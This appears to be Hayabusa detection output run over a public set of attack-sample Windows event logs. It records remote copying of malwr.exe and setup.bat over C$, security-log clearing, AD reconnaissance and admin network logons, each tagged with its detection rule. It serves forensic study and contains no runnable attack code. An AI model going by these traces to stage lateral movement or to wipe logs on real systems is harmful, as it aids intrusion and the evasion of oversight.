\\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 
0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 